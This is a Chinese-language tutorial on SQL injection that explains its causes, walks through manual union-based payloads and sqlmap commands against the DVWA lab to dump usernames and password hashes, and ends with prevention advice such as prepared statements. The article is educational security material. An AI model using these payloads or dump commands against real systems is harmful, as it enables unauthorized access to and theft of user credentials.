[[398140]]

幾乎所有 Web 應用程序都依賴數據庫來管理在應用程序中處理的數據。在許多情況下，這些數據負責處理核心應用程序邏輯，保存用戶賬戶、權限、應用程序配置設置等。大多數數據庫都保存有結構化、可以使用預先定義的查詢格式或語言訪問的數據，并包含內部邏輯來管理這些數據。本文介紹SQL注入攻擊如何利用語言的漏洞來獲取數據庫中的數據。

1. 原理

首先，SQL語言是一門解釋型語言。所謂的解釋型語言就是一種在運行時由一個運行時組件（runtime component）解釋語言代碼并執行其中指令的語言。與之相對的還有編譯型語言，它的代碼在生成時轉換成機器指令，然后在運行時直接由使用該語言的計算機處理器執行這些指令。

從理論上講，任何語言都可以使用編譯器或解釋器來執行，這種區別并不是語言本身的內在特性。但大多數語言僅通過上述一種方法來執行，SQL語言就是這樣。

基于解釋型語言的執行方式，會產生一系列叫作代碼注入的漏洞，SQL注入就是其中的一種。在任何實際用途的Web應用程序都會有用戶交互環節，會收到用戶提交的數據，對其進行處理并執行相應的操作。因此，解釋器處理的數據其實是由程序員編寫的SQL語句代碼和用戶提交的數據共同組成的。在這個時候，攻擊者可以提交專門設計過的 SQL 語句，向Web應用程序攻擊。結果，解釋器就會將這其中一部分的輸入解釋成程序指令執行，就像一開始程序員編寫的代碼一樣。因此，SQL注入漏洞就隨之形成了。

除了語言本身的原因，SQL注入產生的另一個原因就是未過濾問題。在編寫Web應用時，由于其自主訪問控制的性質，程序員往往會對用戶輸入的信息進行一定程度上的過濾操作，過濾掉一些危險的字符，如or、單引號、注釋符等。但往往有些經驗不足的程序員會忽視這一問題，只是進行簡單的過濾，從而讓攻擊者有機可乘。

SQL注入漏洞存在時間非常久，在Web應用高速發展的今天，已經很難見到SQL注入漏洞了。但是學習的目的在于了解其根本以及如何防范這種漏洞的產生。

2. 注入分類

接下來了解一下具體的SQL實施與分類。

在實戰中，主要會接觸到3個不同類型的注入點，它們分別是數字型、字符型和搜索型。在編寫實際的Web應用程序時，程序員會根據不同的數據類型，編寫不同的查詢代碼如下。 

“？”表示需要輸入的數據。  
數字型：SELECT * FROM user WHERE id=?  
字符型：SELECT * FROM user WHERE username=‘?’  
搜索型：SELECT * FROM user WHERE username=‘% ? %’ 

每個類型在輸入數據的時候，對數據做了一定的規范，因此，才產生了這樣的劃分，我們會在接下來的實例介紹中重點去區分數字型與字符型。要提前申明一點，雖然這里將注入點劃分了一定的類型，但是注入的步驟與原理都是一致的，因此，這種區分只是從數據角度去劃分的。

接下來將對SQL注入執行的步驟進行實例分析，在整個分析過程中，我們會將數字型與字符型細分開來，并且會先對手工SQL注入進行剖析，然后再教大家去使用工具。對于從事安全的人員來說，工具只是實現滲透的一種手段，不能過多依賴于工具的操作。工具也是安全人員為了簡化步驟而編寫出來的。對于剛剛接觸安全的人來說，工具會更方便，了解原理才能真正掌握了這個漏洞。

在DVWA中的SQL Injection，在其中輸入框中輸入1，然后提交，如圖1所示。

圖1  ID:1

這里要先對注入點的類型進行判斷，按照一般的步驟，輸入數字時會先考慮這是一個數字型的注入點，所以會先按照數字型的方式操作注入點。

在其中輸入1 and 1=1，如圖2所示。

圖2  1D:1 and 1=1

在圖2中，我們可以看到ID的數據變成了 1 and 1=1，很明顯，這里的ID是一個字符型。所以對注入點類型的判斷是字符型。

接下來判斷該注入點是否有效。因為在實際操作中，某些應用程序雖然允許此類輸入操作的發生，但是它會在內部邏輯中過濾掉該部分?？梢酝ㄟ^一個經典的操作來判斷注入點是否有效。

在其中輸入1’and‘1’=’1時，如圖3所示。

圖3  ID：1’and‘1’=’1

之后再輸入 1’and‘1’=’2，如圖4所示。

圖4  ID：1’and‘1’=’2

這里會出現兩種不同的結果，而這兩種結果證明這個注入點是有效的。and 1=1 是一個永真命題，and后面的條件永遠成立，而and 1=2正好相反，1=2是一個永假命題，and后面的條件不成立。對于Web應用來說，在條件不成立的情況下也不會將結果返回給用戶，所以在圖4中看不到數據。

前面的操作是SQL注入點判斷的基本操作。后續對于不同的數據庫有不同的操作。數據庫大致可以分成Access數據庫、MySQL數據庫、SQLServer數據庫、Oracle數據庫等。Access數據庫是比較早期應用于Web應用的數據庫。早期的Web應用主要以顯示大量文本數據的靜態網頁組成。但是，近幾年Access數據庫的使用逐漸減小，因為它不能適應大量用戶的訪問，并且安全性沒有其他數據庫高。而現在使用較多的是MySQL數據庫。SQL Server和Oracle在大型公司比較適用。

MySQL 數據庫允許使用聯合查詢的方式，這樣查詢更加便捷。接下來，我們繼續剛才的操作，判斷完注入點之后，需要判斷該數據表存在的列數，輸入1’order by 1#，如圖5所示。

圖5  ID：1’order by 1#

order by是根據列值查找的命令，#起到的作用是注釋，防止后續語句的干擾?？梢岳^續嘗試輸入： 

1’order by 6 # 

運行結果，如圖6所示。

圖6  列值查找

它會顯示錯誤，找不到列值為6的列。這是因為該表中不存在6列，按照這個步驟，可以從1開始，逐步往上增加，直到出現一個數報錯為止，這樣，就可以知道該表中具體有多少列，當然，DVWA經過測試可以知道一共有2列。

知道列數之后，我們要看 MySQL 數據庫的版本，因為 MySQL5.0 以后的版本具有information_schema數據庫，里面存有所有數據庫的數據表名和列名，如圖7所示。

圖7  information_schema數據庫

利用這個數據庫來進行數據的檢索，所以在此之前需要查看該應用使用的MySQL數據庫版本，輸入： 

1’union select version(),2 # 

提交結果，如圖8所示。

圖8  查看版本

可以看到數據庫的版本是 5.0.51a-3ubuntu5，知道了版本之后，就可以使用information_shchema來完成后續的操作。輸入： 

1' union select table_name,2 from information_schema.tables where table_schema=database()# 

提交結果，如圖9所示。

圖9  查看表名

可以看到，圖中顯示出來兩個表名。然后再來理解上面輸入的語句，information_schema數據庫中含有 tables 這個數據表，條件是表數據庫名與 database()相同，而 database()正是當前查詢的數據庫。

然后查詢列名，輸入： 

1' union select group_concat(column_name),2 from information_schema.columns where table_name='users' # 

運行結果，如圖10所示。

圖10  查看列名

一共可以看到6個列名，輸入語句其實與上面那句類似，就是找到這個數據表中的列名。有了這些數據，就可以列出想要的數據了，輸入： 

1' union select user,password from users# 

運行結果，如圖11所示。

圖11  列出數據

這里的密碼是使用MD5加密的，可以利用工具在線解密。

3. SQL注入工具

SQL注入工具有很多，比較好用的有Pangolin和SQLMap工具。這兩個工具對于初學者來說，上手難度不大。

Pangolin 是一款幫助滲透測試人員進行 SQL 注入（SQL Injeciton）測試的安全工具。Pangolin與JSky（Web應用安全漏洞掃描器、Web應用安全評估工具）都是NOSEC公司的產品。Pangolin具備友好的圖形界面并支持測試幾乎所有數據庫（Access、MsSQL、MySQL、Oracle、Informix、DB2、Sybase、PostgreSQL、SQLite）。Pangolin能夠通過一系列非常簡單的操作，達到最大化的攻擊測試效果。它從檢測注入開始到最后控制目標系統，都給出了測試步驟。Pangolin是目前國內使用率最高的SQL注入測試的安全軟件。

SQLMap 是一個自動SQL注入工具，其可執行一個廣泛的數據庫，管理系統后端指紋，檢索DBMS數據庫、usernames、表格、列，并列舉整個DBMS信息。SQLMap提供轉儲數據庫表以及MySQL、PostgreSQL、SQL Server服務器下載或上傳任何文件并執行任意代碼的能力。

在Windows命令行中輸入： 

>sqlmap.py-u"http://192.168.221.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="security=low;PHPSESSID=66a9820184bd663d1f6c757704c8b435"-b--current-db 

運行結果，如圖12所示。

圖12  獲取數據庫名

這里可以看到數據庫的名稱“dvwa”，之后輸入： 

sqlmap.py-u"http://192.168.221.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="security=low;PHPSESSID=66a9820184bd663d1f6c757704c8b435"-D dvwa –tables 

運行結果，如圖13所示。

圖13  獲取數據庫表名

可以看到該數據庫中有兩個表，之后輸入： 

sqlmap.py-u"http://192.168.221.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="security=low;PHPSESSID=66a9820184bd663d1f6c757704c8b435"-D dvwa-T users –column 

運行結果，如圖14所示。

圖14  獲取數據庫列名

可以看到一共有6個列名，之后就dump數據就可以了。輸入： 

sqlmap.py-u"http://192.168.221.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="security=low;PHPSESSID=66a9820184bd663d1f6c757704c8b435"-D dvwa-T users-C user,password –dump 

運行結果，如圖15所示。

圖15  SQLMap運行結果

SQLMap自帶字典可以來破譯比較弱的密碼。從操作上看，SQLMap是一款功能比較強大的自動注入工具，但是在安全級別較高的應用中，SQLMap的使用還是很有限的。

4. 預防SQL注入

對于服務器層面的防范，應該保證生產環境的Webshell是關閉錯誤信息的。例如，PHP生產環境的配置php.ini中的display_error是off，這樣就可以關閉服務器的錯誤提示。另外可以從編碼方面去預防SQL注入。

使用預編譯語句，是防御SQL注入的最佳方式，就是使用預編譯語句綁定變量。例如，JSP中使用的預編譯的SQL語句： 

String sql=“SELECT * FROM users where username=?”;  
PreparedStatement pstmt=connection.prepareStatement();  
pstmt.setString(1,admin); 

從上述代碼可以看到“？”處與后面輸入的變量相互綁定，之后攻擊者如果再使用and 1=1之類的注入語句，應用程序會將整個部分當作是username來檢索數據庫，并不會造成修改語義的問題。對于有些無法使用預編譯的部分程序，還有其他方法可以預防。

檢查變量類型和格式也是一個不錯的方法。如果要求用戶輸入的數據是整型的，那么就可以在查詢數據庫之前檢查一下獲取到的變量是否為整型，如果不為整型就重新校正。還有一些特殊的格式類型，如日期、時間、郵箱等格式?？偟貋碚f，只要有固定格式的變量，在SQL語句執行前，應該嚴格按照格式去檢查，可以最大程度上預防SQL注入攻擊。

還有一種方法就是過濾掉特殊的符號。在SQL注入時，往往需要一些特殊的符號幫助我們編寫語句，如單引號（’）、井號（#）、雙引號（”）等。可以將這些符號都進行轉義處理或使用正則表達式過濾掉。

除了編碼層面的預防，還需要做到數據庫層面的權限管理，盡量減少在數據庫中使用Root權限直接查詢的次數。如果有多個應用程序使用同一個數據庫，那么數據庫應該分配好每個應用程序的權限。